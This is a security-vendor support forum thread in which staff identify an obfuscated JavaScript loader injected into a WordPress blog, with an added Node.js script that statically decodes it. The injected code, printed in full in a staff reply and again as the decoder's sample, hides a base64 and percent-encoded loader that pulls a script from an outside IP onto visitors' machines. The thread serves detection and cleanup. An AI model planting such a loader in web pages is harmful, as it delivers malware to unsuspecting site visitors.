BenoitCHOPLIN Posted September 29, 2020 ID:1410570
Hello,
Our website seems to be wrongly blocked by your realtime website scan engine, despite a clean report on VirusTotal and with ImunifyAV on our hosted server, as well as various online website scanning tools. Blocking is not immediate and happens after about 1 hour of surfing. It was reported by one customer (only, so far) and we managed to reproduce it on our own computers. Here is the information:
URL: https://www.creatricesbroderiemachine.com/
Server IP: 85.236.155.161
Malwarebytes screenshots attached as well as report mb.txt
Staff Solution Dashke Posted September 29, 2020 ID:1410575
Please check your website for suspicious code -
<p> <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><script src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs="></script><script src="./3 façons créatives d’utiliser des restes de tissu et broder durablement – Le mag CBM_files/5cw2fk"></script> <!--/codes_iframe--></p>
BenoitCHOPLIN Posted September 29, 2020 Author ID:1410577
I'm sorry, but I can't find this one. Any more details, please?
Staff Dashke Posted September 29, 2020 ID:1410578
Please check this link for example - creatricesbroderiemachine.com/blog/2017/05/06/3-facons-creatives-dutiliser-des-restes-de-tissu-et-broder-durablement
BenoitCHOPLIN Posted September 29, 2020 Author ID:1410580
OK, found it too at the same time. This is from our WordPress associated blog, not from the main website itself, which explains why we didn't find anything. Thanks for pointing at this so quickly. As soon as I fix it, what's next regarding MB flagging?
Staff Dashke Posted September 29, 2020 ID:1410581
When you remove the malicious script, please let me know in this thread and I will remove the block after inspecting the website.
BenoitCHOPLIN Posted September 29, 2020 Author ID:1410583
OK. I cleaned up all the posts with the malicious code and checked all potential other locations. Everything should be fine now. BTW: do you have any idea of what this code was actually doing?
Staff Dashke Posted September 29, 2020 ID:1410585
9 minutes ago, BenoitCHOPLIN said:
> OK. I cleaned up all the posts with the malicious code and checked all potential other locations. Everything should be fine now. BTW: do you have any idea of what this code was actually doing?
It would pull a file from http://185.156.177.85/5cw2fk on the customer's computer. Thanks, the block will be removed soon.
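Added example (not part of the thread and not Malwarebytes tooling): a static decoder for the two layers used by the snippet Dashke posted, a base64 data: URI wrapping a percent-encoded unescape() string, run here over the blob copied from that post. The function and constant names are assumptions made for this example, and it targets Node.js because it relies on the global Buffer.

```javascript
// Added example, not from the thread. Static analysis only: the input is
// treated as text, nothing is evaluated or fetched. Names are illustrative.

// Layer 1: a script source hidden in a base64 data: URI.
const DATA_URI = /data:text\/javascript;base64,([A-Za-z0-9+\/]+={0,2})/g;
// Layer 2: a fully percent-encoded string passed to unescape().
const UNESCAPE_ARG = /unescape\(\s*(['"])((?:%[0-9A-Fa-f]{2})+)\1\s*\)/g;
// Final layer: the src attribute of the tag that document.write() would emit.
const SRC_ATTR = /src\s*=\s*["']\s*([^"'\s>]+)/gi;
// Comment marker that wraps the injected block in the post above.
const MARKER = '<!--codes_iframe-->';

// Like unescape(): every %XX becomes the character with that code.
function percentDecode(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Returns whether the marker is present and every script URL the hidden layers resolve to.
function scanPost(html) {
  const sources = new Set();
  for (const [, b64] of html.matchAll(DATA_URI)) {
    const js = Buffer.from(b64, 'base64').toString('latin1');
    for (const [, , encoded] of js.matchAll(UNESCAPE_ARG)) {
      for (const [, url] of percentDecode(encoded).matchAll(SRC_ATTR)) sources.add(url);
    }
  }
  return { marker: html.includes(MARKER), sources: [...sources] };
}

// Sample input: the base64 blob copied from the post above, in a minimal wrapper.
const SAMPLE_FROM_THREAD = MARKER + '<script src="data:text/javascript;base64,' +
  'ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=' +
  '"></script><!--/codes_iframe-->';

console.log(scanPost(SAMPLE_FROM_THREAD));
```

Feeding each post's stored HTML (for example from a database export) through scanPost lists the posts that still carry the marker or a hidden loader after cleanup.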
BenoitCHOPLIN Posted September 29, 2020 Author ID:1410588
Thank you very much!
Staff Dashke Posted September 29, 2020 ID:1410589
7 minutes ago, BenoitCHOPLIN said:
> Thank you very much!
You are always welcome! The block has been removed from the next update. Wish you a great day!